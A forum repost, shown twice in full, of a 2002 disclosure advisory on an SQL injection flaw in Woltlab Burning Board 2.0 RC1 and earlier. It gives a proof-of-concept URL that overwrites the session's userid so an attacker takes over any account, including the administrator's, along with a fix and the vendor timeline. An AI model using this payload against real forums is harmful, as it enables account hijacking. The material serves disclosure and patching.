NI3
11-02-2003, 12:51 PM
Subject: sql injection vulnerability in WBB 2.0 RC1 and below
Date: Sep 8 2002 1:56PM
Author: Cano2 <[Only registered and activated users can see links]>
Hi,
I discovered a serious vulnerability in Woltlab Burning Board 2.0 RC 1
and below some weeks ago. The latest version (WBB 2.0 RC 2) seems not
vulnerable, but there are still sites using vulnerable versiones.
[versions tested vulnerable]
WBB 2.0 RC 1
WBB 2.0 beta 5
WBB 2.0 beta 4
WBB 2.0 beta 3
[description]
It allows any user (even guests, may depend
on configuration) to compromise every other account (Administrator
one's too). It's caused by a variable containing unchecked userinput
in board.php, which can be used for a sql injection attack.
The query looks similar to the following:
UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri = '$[Only registered and activated users can see links]'',
boardid =
'$boardid', threadid = 'xx' WHERE hash = '$sid'
Because the content of $boardid is not checked, it's possible to
overwrite othe fields in the table.
[proof of concept]
board.php?boardid=[boardid]%27,%20userid=%27[victims userid, 1 is
usually an admin]&sid=[attackers session-id]
The executed query now looks like that:
UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri =
'board.php?boardid=[boardid]%27,%20userid=%27[gewnschte userid, 1 ist i.d.R immer
admin]&sid=[session-id]', boardid = '[boardid]' userid='[gewnschte userid, 1 ist i.d.R immer
admin]',
threadid = 'xx' WHERE hash = '$sid'
As you can see, the userid of the attackers session is overwritten
with the victim one's.
[solution]
Update to the latest Version (WBB 2.0 RC2) or check every variable
possibly containing userinput.
p.e.
$boardid = mysql_escape_string($boardid);
[vendor status]
29.7.02 contacted Woltlab
12.8.02 release of WBB 2.0 RC 2 (seems not vulnerable)
I did't get an answer from Woltlab until now.
Date: Sep 8 2002 1:56PM
Author: Cano2 <[Only registered and activated users can see links]>
Hi,
I discovered a serious vulnerability in Woltlab Burning Board 2.0 RC 1
and below some weeks ago. The latest version (WBB 2.0 RC 2) seems not
vulnerable, but there are still sites using vulnerable versiones.
[versions tested vulnerable]
WBB 2.0 RC 1
WBB 2.0 beta 5
WBB 2.0 beta 4
WBB 2.0 beta 3
[description]
It allows any user (even guests, may depend
on configuration) to compromise every other account (Administrator
one's too). It's caused by a variable containing unchecked userinput
in board.php, which can be used for a sql injection attack.
The query looks similar to the following:
UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri = '$[Only registered and activated users can see links]'',
boardid =
'$boardid', threadid = 'xx' WHERE hash = '$sid'
Because the content of $boardid is not checked, it's possible to
overwrite othe fields in the table.
[proof of concept]
board.php?boardid=[boardid]%27,%20userid=%27[victims userid, 1 is
usually an admin]&sid=[attackers session-id]
The executed query now looks like that:
UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri =
'board.php?boardid=[boardid]%27,%20userid=%27[gewnschte userid, 1 ist i.d.R immer
admin]&sid=[session-id]', boardid = '[boardid]' userid='[gewnschte userid, 1 ist i.d.R immer
admin]',
threadid = 'xx' WHERE hash = '$sid'
As you can see, the userid of the attackers session is overwritten
with the victim one's.
[solution]
Update to the latest Version (WBB 2.0 RC2) or check every variable
possibly containing userinput.
p.e.
$boardid = mysql_escape_string($boardid);
[vendor status]
29.7.02 contacted Woltlab
12.8.02 release of WBB 2.0 RC 2 (seems not vulnerable)
I did't get an answer from Woltlab until now.